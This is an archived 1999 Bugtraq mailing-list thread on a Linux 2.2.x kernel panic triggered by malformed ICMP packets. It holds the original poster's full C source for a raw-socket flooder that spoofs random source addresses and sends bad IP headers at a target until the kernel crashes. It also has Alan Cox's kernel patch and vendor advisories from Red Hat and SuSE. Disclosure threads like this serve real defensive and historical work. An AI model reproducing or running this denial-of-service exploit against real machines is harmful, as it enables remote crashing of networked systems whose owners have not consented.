Date: Tue, 1 Jun 1999 17:43:17 +0200 From: Piotr Wilkin <pwl@WOTAN.2SLO.WAW.PL> To: BUGTRAQ@netspace.org Subject: Linux kernel 2.2.x vulnerability/exploit I'm sorry if this has been noticed before, but since I did't find anything in the archives, I post it here. There seems to be a bug in kernels 2.2.x (tested on 2.2.7 and 2.2.9), that causes them to panic when they are sent a large number of specific ICMP packages. I think the problem comes from the combination of the mangled header length (shorter or longer ihl's don't cause hangup) and the random ICMP packets (random type/subtype and source address) this program sends. Windows 9x and FreeBSD 3.0 seem to be unaffected. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-- Here is the program source (under Linux): -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-- #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> #include <arpa/inet.h> #include <errno.h> #include <unistd.h> #include <netdb.h> struct icmp_hdr { struct iphdr iph; struct icmp icp; char text[1002]; } icmph; int in_cksum(int *ptr, int nbytes) { long sum; u_short oddbyte, answer; sum = 0; while (nbytes > 1) { sum += *ptr++; nbytes -= 2; } if (nbytes == 1) { oddbyte = 0; *((u_char *)&oddbyte) = *(u_char *)ptr; sum += oddbyte; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } struct sockaddr_in sock_open(char *address, int socket, int prt) { struct hostent *host; if ((host = gethostbyname(address)) == NULL) { perror("Unable to get host name"); exit(-1); } struct sockaddr_in sin; bzero((char *)&sin, sizeof(sin)); sin.sin_family = PF_INET; sin.sin_port = htons(prt); bcopy(host->h_addr, (char *)&sin.sin_addr, host->h_length); return(sin); } void main(int argc, char **argv) { int sock, i, ctr, k; int on = 1; struct sockaddr_in addrs; if (argc < 3) { printf("Usage: %s <ip_addr> <port>\n", argv[0]); exit(-1); } for (i = 0; i < 1002; i++) { icmph.text[i] = random() % 255; } sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1) { perror("Can't set IP_HDRINCL option on socket"); } if (sock < 0) { exit(-1); } fflush(stdout); for (ctr = 0;ctr < 1001;ctr++) { ctr = ctr % 1000; addrs = sock_open(argv[1], sock, atoi(argv[2])); icmph.iph.version = 4; icmph.iph.ihl = 6; icmph.iph.tot_len = 1024; icmph.iph.id = htons(0x001); icmph.iph.ttl = 255; icmph.iph.protocol = IPPROTO_ICMP; icmph.iph.saddr = ((random() % 255) * 255 * 255 * 255) + ((random() % 255) * 65535) + ((random() % 255) * 255) + (random() % 255); icmph.iph.daddr = addrs.sin_addr.s_addr; icmph.iph.frag_off = htons(0); icmph.icp.icmp_type = random() % 14; icmph.icp.icmp_code = random() % 10; icmph.icp.icmp_cksum = 0; icmph.icp.icmp_id = 2650; icmph.icp.icmp_seq = random() % 255; icmph.icp.icmp_cksum = in_cksum((int *)&icmph.icp, 1024); if (sendto(sock, &icmph, 1024, 0, (struct sockaddr *)&addrs, sizeof(struct sockaddr)) == -1) { if (errno != ENOBUFS) printf("X"); } if (ctr == 0) printf("b00m "); fflush(stdout); } close(sock); } --------------------------------------------------------------------------------- Date: Tue, 1 Jun 1999 23:30:33 +0100 From: Alan Cox <alan@LXORGUK.UKUU.ORG.UK> To: BUGTRAQ@netspace.org Subject: Linux 2.2 DoS attack Ok problem confirmed. Its not icmp however - in fact the program given has some bugs that cause it. If it had been a correctly written icmp tester it wouldnt have worked. A blessing in disguise. Anyway the fix seems to be this. Sorry it took so long to sort out. --- ../linux.vanilla/net/ipv4/ip_options.c Wed May 12 16:49:38 1999 +++ net/ipv4/ip_options.c Tue Jun 1 22:11:46 1999 @@ -452,7 +452,6 @@ error: if (skb) { icmp_send(skb, ICMP_PARAMETERPROB, 0, htonl((pp_ptr-iph)<<24)); - kfree_skb(skb); } return -EINVAL; } Alan --------------------------------------------------------------------------------- Date: Wed, 2 Jun 1999 08:59:07 +0200 From: Piotr Wilkin <pwl@WOTAN.2SLO.WAW.PL> To: BUGTRAQ@netspace.org Subject: Re: Linux kernel 2.2.x vulnerability/exploit I forgot to add two things 1) This code is very machine-specific, I tried it on our nfs-mounted debian in school, but I don't know what are the hardware "requirements" for it to work 2) It was compiled by g++ -- g++ exploit.cpp -o exploit P.S. Sorry, I don't KNOW how to patch it (I hope the guys at kernel.org know) --------------------------------------------------------------------------------- Date: Wed, 2 Jun 1999 16:56:41 -0400 From: Matt Wilson <msw@REDHAT.COM> To: BUGTRAQ@netspace.org Subject: [SECURITY] New kernel packages available New packages that correct a vulnerability in the kernels that shipped with Red Hat Linux 6.0 are now available. When exploited this vulnerability allows remote users to crash machines running 2.2.x kernels. Thanks to Piotr Wilkin for reporting the problem and to Alan Cox for the fix. Red Hat Software recommends that all users with networked machines upgrade to this release. The procedure for upgrading the kernel is documented at http://www.redhat.com/corp/support/docs/kernel-upgrade/kernel-upgrade.html Please read the entire section for your architecture before upgrading. Red Hat Linux 6.0 ================= Intel ----- rpm -ivh ftp://updates.redhat.com/6.0/i386/kernel-2.2.5-22.i386.rpm rpm -ivh ftp://updates.redhat.com/6.0/i386/kernel-2.2.5-22.i586.rpm rpm -ivh ftp://updates.redhat.com/6.0/i386/kernel-smp-2.2.5-22.i586.rpm rpm -ivh ftp://updates.redhat.com/6.0/i386/kernel-2.2.5-22.i686.rpm rpm -ivh ftp://updates.redhat.com/6.0/i386/kernel-smp-2.2.5-22.i686.rpm Alpha ----- rpm -ivh ftp://updates.redhat.com/6.0/alpha/kernel-2.2.5-22.alpha.rpm rpm -ivh ftp://updates.redhat.com/6.0/alpha/kernel-smp-2.2.5-22.alpha.rpm SPARC/UltraSPARC ---------------- Note: These packages obsolete the earlier kernel-2.2.5-21 release for SPARC. The problems fixed by the 2.2.5-21 release are also fixed in 2.2.5-22. rpm -ivh ftp://updates.redhat.com/6.0/sparc/kernel-2.2.5-22.sparc.rpm rpm -ivh ftp://updates.redhat.com/6.0/sparc/kernel-smp-2.2.5-22.sparc.rpm rpm -ivh ftp://updates.redhat.com/6.0/sparc/kernel-2.2.5-22.sparc64.rpm rpm -ivh ftp://updates.redhat.com/6.0/sparc/kernel-smp-2.2.5-22.sparc64.rpm Source RPM ---------- rpm -Uvh ftp://updates.redhat.com/6.0/SRPMS/kernel-2.2.5-22.src.rpm =================================================================== Matt Wilson PGP public key: http://charlotte.redhat.com/~msw/pgp_public_key.asc --------------------------------------------------------------------------------- SuSE Security Announcement Jun 4th, 01:49:58 -----BEGIN PGP SIGNED MESSAGE----- ______________________________________________________________________________ SuSE Security Announcement Package: Linux kernel 2.2.x Date: Thu Jun 3 19:50:05 CEST 1999 Affected: All Linux systems using kernel 2.2.x ______________________________________________________________________________ A security hole were discovered in the package mentioned above. Please update as soon as possible or disable the service if you are using this software on your SuSE Linux installation(s). Other Linux distributions or operating systems might be affected as well, please contact your vendor for information about this issue. Please note, that that we provide this information on as "as-is" basis only. There is no warranty whatsoever and no liability for any direct, indirect or incidental damage arising from this information or the installation of the update package. ______________________________________________________________________________ 1. Problem Description The Linux kernel 2.2.x doesn't correctly parse the IP options, which leads to kernel panic. 2. Impact Linux machines running kernel 2.2.x could be shut down over the network by sending malicious formated ICMP packets. 3. Solution Install the fixed kernel from our ftp server. ______________________________________________________________________________ Here is the md5 checksum of the upgrade package, please verify these before installing the new package: d7da41803cde484fac910dc0eaa0a5df lx_suse-2.2.7.SuSE-3.i386.rpm c106a0465630260cfa4181c2c0e84ec4 linux-2.2.7.SuSE.tgz ______________________________________________________________________________ You will find the updates on our ftp-Server: ftp://ftp.suse.com/pub/SuSE-Linux/suse_update/kernel/linux-2.2.7.SuSE.tgz ftp://ftp.suse.com/pub/SuSE-Linux/suse_update/suse61/d1/lx_suse-2.2.7.SuSE-3.i386.rpm Webpage for patches: http://www.suse.de/patches/index.html or try the following web pages for a list of mirrors: http://www.suse.de/ftp.html http://www.suse.com/ftp_new.html ______________________________________________________________________________ SuSE has got two free security mailing list services to which any interested party may subscribe: suse-security@suse.com - unmoderated and for general/linux/SuSE security discussions. All SuSE security announcements are send to this list. suse-security-announce@suse.com - SuSE's announce-only mailing list. Only SuSE's security annoucements are sent to this list. To subscribe, send an email to majordomo@suse.com with the text subscribe suse-security or subscribe suse-security-announce in the body of the message. Or just issue a echo subscribe suse-security | mail majordomo@suse.com or echo subscribe suse-security-announce | mail majordomo@suse.com ______________________________________________________________________________ If you want to report *NEW* security bugs in the SuSE Linux Distribution please send an email to security@suse.de or call our support line. You may use pgp with the public key below to ensure confidentiality. ______________________________________________________________________________ This information is provided freely to everyone interested and may be redistributed provided that it is not altered in any way. Type Bits/KeyID Date User ID pub 2048/3D25D3D9 1999/03/06 SuSE Security Team - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3i mQENAzbhLQQAAAEIAKAkXHe0lWRBXLpn38hMHy03F0I4Sszmoc8aaKJrhfhyMlOA BqvklPLE2f9UrI4Xc860gH79ZREwAgPt0pi6+SleNFLNcNFAuuHMLQOOsaMFatbz JR9i4m/lf6q929YROu5zB48rBAlcfTm+IBbijaEdnqpwGib45wE/Cfy6FAttBHQh 1Kp+r/jPbf1mYAvljUfHKuvbg8t2EIQz/5yGp+n5trn9pElfQO2cRBq8LFpf1l+U P7EKjFmlOq+Gs/fF98/dP3DfniSd78LQPq5vp8RL8nr/o2i7jkAQ33m4f1wOBWd+ cZovrKXYlXiR+Bf7m2hpZo+/sAzhd7LmAD0l09kABRG0JVN1U0UgU2VjdXJpdHkg VGVhbSA8c2VjdXJpdHlAc3VzZS5kZT6JARUDBRA24S1H5Fiyh7HKPEUBAVcOB/9b yHYji1/+4Xc2GhvXK0FSJN0MGgeXgW47yxDL7gmR4mNgjlIOUHZj0PEpVjWepOJ7 tQS3L9oP6cpj1Fj/XxuLbkp5VCQ61hpt54coQAvYrnT9rtWEGN+xmwejT1WmYmDJ xG+EGBXKr+XP69oIUl1E2JO3rXeklulgjqRKos4cdXKgyjWZ7CP9V9daRXDtje63 Om8gwSdU/nCvhdRIWp/Vwbf7Ia8iZr9OJ5YuQl0DBG4qmGDDrvImgPAFkYFzwlqo choXFQ9y0YVCV41DnR+GYhwl2qBd81T8aXhihEGPIgaw3g8gd8B5o6mPVgl+nJqI BkEYGBusiag2pS6qwznZiQEVAwUQNuEtBHey5gA9JdPZAQFtOAf+KVh939b0J94u v/kpg4xs1LthlhquhbHcKNoVTNspugiC3qMPyvSX4XcBr2PC0cVkS4Z9PY9iCfT+ x9WM96g39dAF+le2CCx7XISk9XXJ4ApEy5g4AuK7NYgAJd39PPbERgWnxjxir9g0 Ix30dS30bW39D+3NPU5Ho9TD/B7UDFvYT5AWHl3MGwo3a1RhTs6sfgL7yQ3U+mvq MkTExZb5mfN1FeaYKMopoI4VpzNVeGxQWIz67VjJHVyUlF20ekOz4kWVgsxkc8G2 saqZd6yv2EwqYTi8BDAduweP33KrQc4KDDommQNDOXxaKOeCoESIdM4p7Esdjq1o L0oixF12Cg== =pIeS - -----END PGP PUBLIC KEY BLOCK----- -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQEVAwUBN1dUQney5gA9JdPZAQHnWQf9EMvrfAlTBiq6kVl1ZYrHZJEI1F+CQY68 baAOl6Du5YBbW4oIlTdY8W1an4m/BRMGfR3lTV/7N+o0Bd7kvmwg6n8e4HQmRJL/ XWUQRATkMV3QCe24ACzvpATELf8KakDaxjpbSWPGwoslmeTg+1G1z1vH7423YOGG OymxfiPOselUZoU/x2nexRHi/TjlcAu4eAWJ59/PC4i0OMT3V1Hqb3eYfIHlikQz xMh/T3HeY8MNS+8JT0MlHVc+b8KdaZ5wA+f3KG4ot9yAeoqKjxK43I3JjkEAhvxg QrR99Fh5YBMUrieQ1Kkvpp1T3JdQi1Cf0NpgYx9kSZDO3fAD60lZww== =uBdV -----END PGP SIGNATURE-----